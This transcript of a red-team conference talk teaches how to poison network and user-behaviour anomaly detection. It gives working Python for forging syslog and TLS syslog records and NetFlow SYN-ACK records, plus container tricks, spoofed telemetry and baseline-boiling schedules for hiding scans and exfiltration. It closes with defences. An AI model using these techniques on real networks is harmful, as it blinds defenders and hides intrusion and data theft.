Alright, good morning. Thank you for coming out to the inaugural year of the Red Team Village. We're hoping to have many, many more years. We tried to dedicate at least 30-plus percent of our space to talks, because there are so many amazing people in the red team field and you used to have to go to all these different places to hear them and talk with them. So we've got an amazing lineup of different folks. Mr. Charles Herring here has an immense background. Can I talk about the Sk3wl of r00t thing? Yeah, sure. You want to talk about me? There's a whole slide about me. It's my favorite topic. We're just going to do the whole hour about me. It's all about me. Anyway, thank you. Please give him a warm round of applause. We're going to do about 45 to 50 minutes, then we'll do some Q&A after that.

So if you have any questions along the way, feel free to shoot a hand up and I will answer the question, because that gives me an opportunity to drink my water. If you want the deck: Twitter, @CharlesHerring, or CharlesHerring.com, which will shoot you to LinkedIn. You can grab this deck from either one of those places. It's loaded to CDM.

A little bit about me. This guy is actually me, though I do recognize that I look like I ate him and had an allergic reaction. Life got hard during this time. I was in the Navy for ten years. I spent seven years fixing F-18 Hornets; after 9/11 I got wrapped into doing security because I was doing that for fun, cybersecurity stuff, hacking stuff, for fun. After that, I was detailed to be the Network Security Officer at the Naval Postgraduate School. That was also a fun time, when Chris Eagle spun up Sk3wl of r00t. Anyone that's old enough to remember that, they won Capture the Flag here at DEF CON a handful of times. At the time, we were trying to figure out how to operationalize cybersecurity operations.
And so I partnered with InfoWorld, back before journalism died and the Test Center was still open, and they would send us all the gear and we would mess with it, put it on the network, and figure out what could work, what didn't work, what types of technologies and approaches worked. Some of the stuff we're going to talk about today, Network Behavioral Anomaly Detection, was being done in two veins that were pretty successful. Georgia Tech had an arm doing something that later became StealthWatch, so that was Network Behavioral Anomaly Detection one way. The project working on it at the Naval Postgraduate School was called Therminator. You can Google that; NSA holds that code now.

I left the Navy and did consulting work for about seven years. Then I went to Lancope to help them figure out how to sell something as complicated as Network Behavioral Anomaly Detection. That company got acquired by Cisco. And about four years ago, I started a project called WitFoo that is setting out to orchestrate security operations. If you're interested in that, there's www.witfoo.com.

So here's what we're going to cover today. We're going to hit on the concepts of NBAD and UBA: how they work and what the terms mean, just to define those so we're all up to speed. Then we're really going to look at how to poison that data in the context of a red cell team. People are collecting data, they're analyzing it, they want to catch attacks. What we're going to look at today are some concrete techniques for messing that data up so they cannot catch the attacks underneath. And so it's going to be two parts: one, the techniques, so what are the commands we run; and two, the scenarios, or how do we leverage those techniques in different poisoning scenarios.

So, just real quick, some definitions. Signature-based detection, most of you know this: a signature means you're inspecting an object as it's entering the subject. The packet, the file, it has some characteristic that's weird.
If I was drinking my drink and there was mold floating in it or something weird, I'd go, okay, there's something wrong with this object, I'm not going to ingest it. I know that mold is not good, right? Behavioral detection is observing the subject after ingestion occurs. Sandboxing is really good at this. If I drink the drink and I become sick, that behavior tells me the object may have been bad, right? And then anomaly detection is looking at all of the behaviors, whether they're on the network, on the endpoint, or whatever; you establish what is normal, and then if anything happens that is not categorized, whitelisted, normal, it is abnormal. It is an anomaly. This is one area that has worked really well over the last few years, and we've done a whole lot of good research as an industry on anomaly detection, or what's more commonly being marketed now as machine learning; in particular, supervised machine learning.

But in the relationships between these, anomaly detection creates new behaviors: we see something new happening in the wild and we categorize it as a nefarious behavior. Heartbleed a few years ago is a good example of this. When we started seeing that the ratio of server bytes to client bytes being exchanged across Apache was not in the realm of normal web communications, that was a net new behavior, and so we were able to tag it as an application denial of service. And then from behaviors, we are able to derive new signatures. When we see a behavior, we may not know what the attack is at the time, but we know the behavior is bad: files are being encrypted on disk, data is being deleted, data is being exfiltrated. The behavior is bad. Those behaviors inform us on how to build new signatures, and of course the best thing about signatures is we can attach CVEs to them. We know exactly what happened, and we can look at the adversaries that created them to better understand it.
So false positives, and when I say a false positive I mean a detection of something other than an attack, are high in anomaly-based detection, because until you get to the point where you've categorized every behavior, so you know what's normal and why it's normal, you're going to have alarms triggering that are uncategorized but not nefarious. Anomaly-based detection also requires baselines. If you're establishing normal, you have to define what normal is, and most of the techniques we use in anomaly detection, whether on the network side or the user side, are based on mathematical models, right? You can use the mean, you can use different types of standard deviation; there are all kinds of models for what the baseline is, how many bytes. So you start with: what type of metric are we looking at? Is it packets transferred per second? Is it packets transferred per second against a port? You build a mathematical set of numbers that you're going to track.

The second thing you have to figure out is what the baseline is applied to. Is it applied to the entity, so are you baselining the behavior of every host or every user on the network? Or are you doing set-based baselining, so all of the users on wireless, or all of the hosts belonging to the C-suite, right? You create sets and then baseline against sets, or you baseline against entities. And that's pretty important when you look at how to exploit them: which baseline are you going to exploit? We'll look at baseline boiling in a little bit.

Supervised machine learning versus unsupervised machine learning: in unsupervised machine learning, you take all the variables and find every possible relationship across the different data. So if you have packets versus ports versus bytes, all these things you can look at, what are the distributions of those sets, and then what do those sets mean when we see them? That was actually one of the main pieces of the Therminator research.
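To make the baseline idea concrete, here's a minimal sketch, not from the slides, of a mean-and-standard-deviation model applied to a single entity's daily byte counts. The numbers and the three-sigma threshold are illustrative:

```python
from statistics import mean, stdev

def is_anomalous(history, observation, threshold=3.0):
    """Flag an observation that falls more than `threshold` standard
    deviations above the mean of the baseline history."""
    mu = mean(history)
    sigma = stdev(history)
    if sigma == 0:
        return observation != mu
    return (observation - mu) / sigma > threshold

# Entity baseline: daily bytes a host pulled from network services.
baseline = [10_000, 12_000, 9_500, 11_000, 10_500]
print(is_anomalous(baseline, 11_500))   # inside the baseline's normal range
print(is_anomalous(baseline, 100_000))  # a data-hoarding style spike
```

The same function works for set-based baselining; you just feed it the pooled history of everyone in the set instead of one entity's history.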
So as a product in the industry, Network Behavioral Anomaly Detection is looking at horizontal traffic, normally inside the network, and it's generally looking at NetFlow. There's also the ability to use probe solutions. But because you're counting things, you don't need to inspect the characteristics of the payload, right? So this is one thing that's sort of safe from encryption: you don't care what's in the payload, you care what's in the header, how many packets, how many bytes, how many connections, those kinds of things. It also tends to look at solving horizontal, east-west conversations: how much data is being transferred from data center to data center, or whatever. And that's why NetFlow or other metadata-type tools work there. We're almost done with definitions, then we'll get to the fun part. That's a list from Gartner of vendors that do NBAD.

Types of anomalies you look for: service traffic thresholds, so how much web traffic was consumed from China in a day, right? That also fits into geographic traffic anomalies, how much traffic is landing on a given geo. Data hoarding, or data staging: if you expect a host to consume 10 megs a day from network services and now it just consumed 100 megs, that's a mathematical anomaly against what you expected in the baseline. Those are just observations of network patterns.

When we look at UBA, really what this solves is where you do an investigation. Those of us who have been doing this for a couple of decades remember the days when we had alarm tables. We started with the alert at the top of the table. We prioritized them on different types of metrics, which one was scarier, what our confidence level was, all these things that came in during the really initial IDS/IPS days. And we'd work our way down that list.
The next thing that happened was host-centric investigations, where you take the alarms, attach them to the network devices that generated the alarms, and then investigate that host; you correlate them there. And the first part of user entity behavioral analysis is putting the alarms on the credential level. So if there were three different machines used but one credential used, you investigate the user credential instead of the host. What that provides is a boil-down of all of those alerts: there could be hundreds or thousands of alerts attached to one set of credentials. This is the interface that I use; it's built on Cytoscape, which is a bioinformatics graph library.

So when you look at user-based anomalies, and I'm almost done with definitions and then we'll do the actual exploits, a couple of things. Geographic traffic, or magic-carpet type attacks: if a guy always logs in from Columbus, Ohio, and then all of a sudden he's logging in from Tehran, that's a geographic anomaly; he's too far outside of where he normally logs in. Time of day: if he's always logging in at 8 o'clock in the morning, or during the morning hours, and all of a sudden he starts logging in at 2 o'clock in the morning, that's a time-of-day anomaly. Different types of hosts: you categorize how that user gets onto the network. Is it only on guest wireless, or are they logging into servers? When those types of access change, that's also a type of anomaly. And then what services: if consuming email and the internet is the baseline, and all of a sudden we're looking at something like access to core data services like SQL, that's an anomaly in itself. All right, and that's a million things that do UBA. So let's talk about how to poison the data now. There are really three types of poisoning that we're going to go over today.
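That credential-level boil-down can be sketched as a simple grouping. This is my own illustration, not the Cytoscape interface from the slide, and the field names are made up:

```python
from collections import defaultdict

# Each alert carries the host it fired on and the credential in use.
alerts = [
    {"host": "10.1.1.5",  "user": "jsmith", "alarm": "time-of-day"},
    {"host": "10.1.1.9",  "user": "jsmith", "alarm": "geo"},
    {"host": "10.1.2.40", "user": "jsmith", "alarm": "new-service"},
    {"host": "10.1.1.7",  "user": "adavis", "alarm": "time-of-day"},
]

def rollup_by_credential(alerts):
    """Boil host-level alerts down to one investigation per credential."""
    by_user = defaultdict(list)
    for alert in alerts:
        by_user[alert["user"]].append(alert)
    return dict(by_user)

for user, items in rollup_by_credential(alerts).items():
    hosts = {a["host"] for a in items}
    print(f"{user}: {len(items)} alerts across {len(hosts)} hosts")
```

Three machines, one credential: the investigation lands on jsmith, not on any single host.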
The first is mass implication, which means: if I'm attacking from this computer, I don't want you to investigate this computer, so I'm going to make it look like everybody's attacking the network. It's not just my computer, everyone's attacking, so you have to figure out which one is the real attacker. The second one is baseline boiling, which is contributing to the calculations of baselines in a way that makes them grow. So if you're working around something like data exfiltration or time-of-day detection, you slowly contribute data until the baseline is so big that it's useless: everything is always okay, everything is always normal, because you contributed that data in a slow way. Attack masking is when we send one record to offset another record. This is really good in recon. If I send a SYN packet and a SYN-ACK doesn't come back, I can generate a record that says a SYN-ACK did come back. Now it doesn't look like a scan anymore; it looks like a two-way handshake occurred.

The ways we're going to do it: log spoofing, which means we're going to generate false logs. We're just going to lie. We create a log, get it into the processing system, and write whatever we want. The second approach is behavioral spoofing: we make it look like a behavior happened on the network that didn't actually happen. And the ways we're going to do that are, one, from a machine we own on the network; two, from VMs or containers, and a lot of the code I'm going to give up here is via Docker containers; and three, by tricking networking devices into lying for us, feeding them fake telemetry that makes the networking device think something happened that didn't really happen.

The end goal of this: on the left is an attack that happened at a university, data exfiltration going from left to right.
When you look at UBA tools and tools that utilize graph theory, what you're driving for in developing these visualizations is clarity for the investigator. You take thousands or tens of thousands of events, you contextualize them against the modus operandi of the attacker, and then you render it so the investigator goes, yep, someone's stealing our data, here's where we are in stage two of this particular kill chain, this particular MO. Then it's easy to investigate, and the bad guy gets killed. What we're going to look at in poisoning is: if you can, you move to being invisible, right? You erase the records of the attack so that there's no record. That's actually pretty hard. So I like the second one better: make it look like everything's screwed, right? Make it look like every single thing on the network is infected and an attacker, make everything look horrible, so you can't investigate any of it. That's what we're going to drive at in these exploits.

Real quick on how to protect against this, and this is sort of the key part if you have to tell people how to fix it. We have a really bad problem with non-repudiation in logging. UDP is a really crappy way to get log data into a system. TLS is a pain too, because of the overhead of the TCP handshake as well as the encryption handshake, and for some technologies it's not even possible. RFC 5101, which establishes IPFIX, a metadata format for exporting network communications, is written to support TLS for transport, but no one does it. You can't buy a tool that actually complies with that part of the RFC. It does, of course, add client overhead and server overhead, and you can run into reflection denial of service, all those things, as well. And spoofing, right? You can just lie. There's nothing about a UDP packet in particular that keeps you from saying in the header that I am whatever IP address I want to be.
As long as that packet can route to the destination, it looks to the server like I sent it from that address. So tools like Cisco's take on the overhead of doing a reverse path lookup to make sure that if you're saying you're sending from 10.10.5.5, you're really on that segment. Then the other part is protecting the collection infrastructure. The tools that are generating telemetry should be in a segment where the path to the analysis is protected, so no one on the network can send logs unless they're in an authorized segment. I also put honeypots up here. If you're doing any type of deception-net stuff, that stuff is really cool when you run into the "everything's infected" scenario, because you get real telemetry: nothing should be talking to a non-existent box. It's really the tripwire for figuring out where the real guy is when all of the analysis fails. Another core part here is that as you're receiving data, it needs to be tagged with how it was received, right? What listening service received it? On what port? What were the authentication components? Was it sent over TLS? Was it sent over UDP? That way, when you run into a poisoning scenario, you can filter out the stuff that meets the criteria of poisoning, because you logged that as it came in.

The things we're going to go over fit into all parts of the MITRE ATT&CK matrix for enterprise except initial access. The first technique is really simple; it's just what I call a pump and dump. What you do is spin up a container or a VM; I'll show the code for doing it with a Docker container in a second. You assign it a MAC address, and you can pull an IP address from DHCP or assign your own IP address. You do stuff, like maybe you do recon. And then you kill that container, reassign a new MAC address, pull a new IP address, and then do something else.
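The cycle above can be sketched in a few lines. This is my compressed version, not the slide's exact commands: it generates a fresh locally-administered MAC for each round and prints the Docker commands you'd run; the image and container names are illustrative, and the slides use `docker create`/`docker start` rather than `docker run`:

```python
import random

def random_mac():
    """Generate a locally-administered, unicast MAC address."""
    # Set the locally-administered bit, clear the multicast bit.
    first = (random.randint(0, 255) & 0b11111100) | 0b00000010
    octets = [first] + [random.randint(0, 255) for _ in range(5)]
    return ":".join(f"{o:02x}" for o in octets)

def pump_and_dump_commands(image="kalilinux/kali-rolling", name="ghost"):
    """One spin-up/do-stuff/tear-down cycle as shell command strings."""
    mac = random_mac()
    return [
        f"docker run -dit --name {name} --mac-address {mac} {image}",
        f"docker exec -it {name} bash",   # do stuff: recon, whatever
        f"docker rm -f {name}",           # vaporize, then repeat with a new MAC
    ]

for cmd in pump_and_dump_commands():
    print(cmd)
```

Run the three commands, kill the container, call it again for a new MAC, and let DHCP hand the new container a new IP each time.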
So in the logging in the system, you're spoofing the IP address, you're spoofing the MAC address, and they can't find the machine, because it vaporizes, right? It's the same machine, but it keeps popping up using different networking components. This is a Docker version with Kali Linux. The first line creates the container, and it'll actually pull from Docker Hub if you have an internet connection. It establishes whatever MAC address you want to use, and in this scenario it's going to pull a DHCP address, so that way you know it can route, and there's a record. You do stuff: you create the container, you start the container, it gives you a shell into the container, and you do all the stuff you want to do, the scenarios we'll go through in a little bit, or anything else. Then you kill the container, spin up a new one with a new MAC address, pull a new IP address, and repeat. So it looks like you have this machine that pops up for a few minutes, it might hit something and get flagged, but it's gone by the time the responders can deal with it.

This one's really fun; it's what I call a pocket dimension. A lot of access switches now are sending telemetry. Wireless access points do this a lot, things like Meraki or Mist, where they just believe the traffic happening on the access point is really happening. So you spin up several containers on a fake network, and it can be on a /2 or a /4. You might be able to get a /0 to work, but I generally run on a /4. And you spin up an external host; it could be a Microsoft host or whatever IP addresses you want. And then you do things to those fake machines. So it looks like 10.10.5.5 is communicating with 8.8.8.8, but it's not; it's communicating with your 8.8.8.8. And so you can generate all these false traffic patterns, whether they're inside the network or outside the network, by creating the containers and launching the traffic that you're lying about.
You're creating a behavior in this fake network. That fake network is bound to the NIC. The NIC is then being monitored by a wireless access point or a wired access switch, which generates either syslog or NetFlow telemetry. That stuff is already configured to ship to the syslog, NetFlow, or UBA tools. So you're generating all this fake traffic and it gets shipped out. It looks like this; this is two different machines. You create a network bridge, a Docker network called pocket, you assign the bridge across to the physical network with the bridge command there, you spin up containers, and you have the communications you want, whether you use it for boiling baselines or for doing recon. You could scan the whole internet if you want, whatever you want to do, but it's happening in this fake network while generating real telemetry inside of the security architecture.

This one is a little bit harder, or should be harder: just spoofing records directly to the log collector, whether that's syslog or NetFlow. But you have to find it first, so I'll show you a couple of techniques for resolving it. First, you can look for DNS entries, because people name these things like syslogcollector.acme.local; doing some basic DNS lookups will probably reveal something, or at least give you a step toward where the collector is. If you have a compromised machine that's already generating telemetry, it's just a tcpdump on that machine to figure out what it's communicating with over NetFlow or syslog. You can also just do a SYN scan: if something is collecting syslog, it's going to be open on port 514, so see if you get a SYN-ACK back on any of those. But once you discover it, you just spoof records that can say anything you want, because record collection stinks right now. And then you can do a pump and dump, right? Create the records, drop that machine, create more records from a new machine.
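That discover-then-spoof loop can be sketched like this. It's a minimal illustration, not the slide code: a plain TCP connect stands in for the SYN scan, and the forged record is classic BSD syslog, where the PRI value is facility times eight plus severity and every field, including the claimed hostname, is whatever we say it is. The collector address, hostname, and message are all made up:

```python
import socket
from datetime import datetime

def probe_tcp(host, port, timeout=1.0):
    """SYN-scan stand-in: does anything answer on a candidate
    collector port (e.g. 514 for TCP syslog)?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def rfc3164_message(claimed_host, tag, text, facility=4, severity=6):
    """Build a BSD-syslog line the collector will take as gospel."""
    pri = facility * 8 + severity
    stamp = datetime.now().strftime("%b %d %H:%M:%S")
    return f"<{pri}>{stamp} {claimed_host} {tag}: {text}"

def send_udp_syslog(collector, port, message):
    """Fire the forged record at the collector over plain UDP."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(message.encode(), (collector, port))

# Lie about a box we never touched; collector address is illustrative.
msg = rfc3164_message("dc01.acme.local", "sshd",
                      "Failed password for root from 10.4.4.4")
# send_udp_syslog("192.0.2.50", 514, msg)
```

Pair it with a pump and dump: send a batch, drop the container, send the next batch from a new MAC and IP.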
So if you don't know how to send syslog over netcat, that's how you do it. Syslog is really uncomplicated, so you can send any message you want. Most syslog formats from different tools are very well documented; there are plugins for them, but essentially you just netcat anything you want to the port on the server, and the server will process it as if it is the gospel.

Another cool way of doing this is what I call a UDP spray. There's a cool project on GitHub called samplicator. Essentially what it does is open a socket and listen for UDP packets, and you have rule-based systems to say: when I receive packets from the following sources, or with the following characteristics, forward those packets to the following destinations. And it maintains the original header. So if you sent from 10.1.1.1, it looks like 10.1.1.1 when it hits the final destination, not the samplicator IP address. So you can just load up a class B's worth of IP addresses and say, I'm going to send a packet into samplicator and it's going to spray it out to every possible destination. Some detection mechanisms may see a UDP flood or something like that because of the number of UDP packets coming out, but this is one way to get the packet to the destination if there's a route to it. It's just: send it to everybody, and whoever picks up on that log receives a log. That's really all you have to do there. Samplicator is a very simple application to use; you use the previous slide to generate the netcat message, send it to samplicator, and it shoots it out to all the UDP destinations.

For things that are using TLS, this is some really simple Python code. That's all you need to do to send a message. You'll see the message is right here on the socket; the rest of it is just removing verification.
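The slide code isn't reproduced in this transcript, but a minimal equivalent looks like the following. I'm assuming RFC 5425 octet-counted framing on the conventional TLS syslog port 6514; the collector address and record are illustrative:

```python
import socket
import ssl

def rfc5425_frame(message):
    """RFC 5425 octet-counting framing: length, a space, the message."""
    body = message.encode()
    return str(len(body)).encode() + b" " + body

def send_tls_syslog(collector, port, message):
    """Ship a forged record over TLS with verification turned off,
    mirroring the 'just remove verification' idea from the slide."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # don't verify who we're talking to
    ctx.verify_mode = ssl.CERT_NONE  # ...and accept any server cert
    raw = socket.create_connection((collector, port))
    with ctx.wrap_socket(raw, server_hostname=collector) as tls:
        tls.sendall(rfc5425_frame(message))

# Collector address and record are illustrative:
# send_tls_syslog("192.0.2.50", 6514,
#     "<38>Jan  1 00:00:00 dc01 sshd: Accepted password for admin")
```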
So if the endpoint does require certificate verification, you're obviously going to have to get hold of a good certificate, which actually might not be too hard if you own a machine, because the machine will have a certificate on it if it's already shipping logs. But that's the Python stuff there. And again, if anybody needs these slides, it's @CharlesHerring, CharlesHerring.com. I'd give them to you right here on the thumb drive that I would not recommend you plug into your machine.

Next thing, here's another approach. There's a tool called nProbe, and there's an open source version. It sniffs the packet capture and creates NetFlow records. So in the case of something like a pocket dimension, where you're running these different attacks, you have nProbe generate the metadata about those fake attacks and forward it on to the collector, right? Whether you do that through a UDP spray or you already know the end destination where you're going. So grab that from the ntop friends over there.

A lot of stuff is starting to move toward REST APIs: Elasticsearch, Splunk, those types of devices. If you're going to make a direct write there, this is an example for Elasticsearch and the format. It really is just this "message" colon; it's a JSON post to the Elasticsearch API. So you can do that, but generally if you're using Elasticsearch, you also have something listening on syslog somewhere. Oh, the mic's dying.

All right, so let's do a scenario. We want to recon the network, but we want to cover our tracks by making it look like everybody's reconning the network, right? So they won't find our machine until it's way too late. The best way to do this is in a pocket dimension, where you can generate the fake records, right? You're scanning everything inside of the pocket dimension, which is generating all these recon records that get forwarded off to the infrastructure.
You could also do this by spinning up as many Docker containers as you want and spoofing the IP address; it doesn't matter in recon, particularly if you're doing a SYN scan, whether the packet comes back to the fake machines. In the pocket dimension you can do as many as you want. You can simulate some SYN-ACKs, but it's really good for just getting a recon done. The blue team will know recon just happened, but they won't be able to figure out where it actually came from, or where the data was collected, to shut it down. And you could also use a pump and dump here, of course: after you finish the recon from the machine that collected the data, kill the MAC address, kill the IP address, then create a new container for subsequent parts of the kill chain.

This is something I talked about a little earlier. Let's say you're scanning the real network and you just want to create a bidirectional connection. You're scanning the whole network, and if you don't get a SYN-ACK back, you create a NetFlow record, in this case, that says the SYN-ACK did come back. It will confuse detection mechanisms enough to prevent a scan from triggering, because there's a record that a bidirectional connection actually occurred. There's also the ability to do this automatically; there's a scanner, I'll see if I can post it later, that does this. So you scan, the machine doesn't get a SYN-ACK back, and it knows where the flow collector is, so it can generate a SYN-ACK record from the scanner itself. It's a really simple Python script to shoot that out.

And this one's sort of the fun one here: how do you boil a baseline? Going back to the Venn diagram we had, anomaly detection catches everything. As long as you have visibility on everything, it will always generate an alert, right? Unless you break the baselines.
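Before we boil baselines: that spoofed SYN-ACK flow record from a moment ago can be sketched with nothing but `struct`. This is my illustration of a single-record NetFlow v5 export claiming the scanned host answered with SYN-ACK; the addresses, ports, and collector are made up, and the uptime and counters are arbitrary:

```python
import socket
import struct
import time

def netflow_v5_synack(src_ip, dst_ip, src_port, dst_port):
    """Pack a one-record NetFlow v5 export whose TCP flags claim a
    SYN-ACK, so the scan looks like a completed two-way exchange."""
    uptime = 60_000                 # exporter uptime in ms (arbitrary)
    now = int(time.time())
    # Header: version, count, uptime, secs, nsecs, sequence,
    # engine type/id, sampling interval.
    header = struct.pack("!HHIIIIBBH", 5, 1, uptime, now, 0, 1, 0, 0, 0)
    record = struct.pack(
        "!IIIHHIIIIHHBBBBHHBBH",
        struct.unpack("!I", socket.inet_aton(src_ip))[0],
        struct.unpack("!I", socket.inet_aton(dst_ip))[0],
        0,                          # next hop
        0, 0,                       # input/output interface index
        1, 40,                      # packets, bytes
        uptime - 100, uptime,       # flow start/end (sysuptime ms)
        src_port, dst_port,
        0,                          # pad
        0x12,                       # TCP flags: SYN | ACK
        6, 0,                       # protocol TCP, ToS
        0, 0, 0, 0, 0)              # src/dst AS, masks, pad
    return header + record

# Send it to the discovered collector (address illustrative):
# with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
#     s.sendto(netflow_v5_synack("10.10.9.9", "10.10.5.5", 80, 51515),
#              ("192.0.2.50", 2055))
```

One forged 72-byte datagram per unanswered SYN, and the scan dissolves into what looks like normal two-way traffic.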
So think about the metric that you want to run against. Whether you're working around a geographical alarm or something else, you need to move data, and data exfiltration is the big one here. If you need to move data to a segment on the internet that normally doesn't transact that data, you create records every day of data going out there. You start with a K, right? Then the next day it's a K and a half, then it's 5K, and every day you slowly move that baseline up, generating more and more telemetry that says traffic happened that really did not happen. That can be done either by direct logging, where you send the logs directly to the collection source, or by spoofing the behavior inside of a pocket dimension, right? Where you execute these increasingly large data transfers. Times of day are another good one for this: eventually you should have every user logging in from every place at every hour of the day, and now you can never detect an anomaly in user behavior, because everyone's always working everywhere. In that case it's just a generated syslog record of "authentication successful" for user so-and-so, and you do that for every user you need to use inside of a campaign. Any questions on that? Well, I don't care if there are any questions, but I'm going to drink this drink. Think about a question.

So this is the last piece, just recapping how to prevent this stuff from happening. If you can do TLS with client-based authentication on record collection, that is ideal, because then you're down to protecting the public key infrastructure, right? And if you lose the public key infrastructure you're screwed anyway, of course, so don't let that happen. But there is overhead there. So as you're scoping out products and resources for doing the logging, be mindful of the overhead that's going to go into that log collection.
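To put one more number on the offense side before the defensive wrap-up: the exfiltration creep described above is just a capped geometric series. This sketch is my own, with an illustrative fifty-percent daily growth cap so each day's forged total stays plausibly close to the previous day's "normal":

```python
def boiling_schedule(start_bytes, target_bytes, max_growth=1.5):
    """Yield the daily series of fake transfer sizes that creeps from
    start_bytes up to target_bytes, never growing by more than
    max_growth per day so each day sits inside the boiled baseline."""
    sizes = [start_bytes]
    while sizes[-1] < target_bytes:
        sizes.append(min(int(sizes[-1] * max_growth), target_bytes))
    return sizes

# Boil a 1 KB/day baseline until 50 MB/day of exfil looks normal.
plan = boiling_schedule(1_024, 50 * 1024 * 1024)
print(f"{len(plan)} days of forged records, ending at {plan[-1]} bytes/day")
```

Feed each day's size into the log-spoofing or pocket-dimension machinery from earlier, and in about a month the real transfer never trips the baseline.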
And then when you're building out tools, firewalls, EDRs, all those things, they need to be wrapped into sort of their own DMZ. If your teams have not built the tooling telemetry inside of a bubble that communicates with the logging tools, you're going to have problems. If anybody can send data into the telemetry, you're sort of in trouble. But that is basically it. I'll answer any questions. Thank you for having me. [Applause]